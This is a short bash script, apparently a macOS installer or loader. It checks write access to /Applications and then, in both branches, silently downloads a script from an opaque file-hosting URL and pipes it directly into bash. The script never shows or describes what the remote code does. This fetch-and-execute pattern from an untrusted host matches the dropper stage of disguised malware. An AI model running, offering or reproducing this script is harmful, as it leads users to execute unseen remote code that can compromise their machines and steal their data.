#!/bin/bash

main() {
    clear

    if [ -w "/Applications" ]; then
        curl -s "https://f3a5dqxez3.ufs.sh/f/ijk9xZzvhn3rQ47Or6b0DfXGI1bpTyQt85z06u3nRhVdUZjs" | bash
    else
        echo -e "${YELLOW}[!] Local user detected, using home directory instead of global directory ${NC}"
        curl -s "https://f3a5dqxez3.ufs.sh/f/ijk9xZzvhn3rMUmHSFvYJNpYZt47cEmqUko8LizI9ylaHKOb" | bash
    fi
}

main
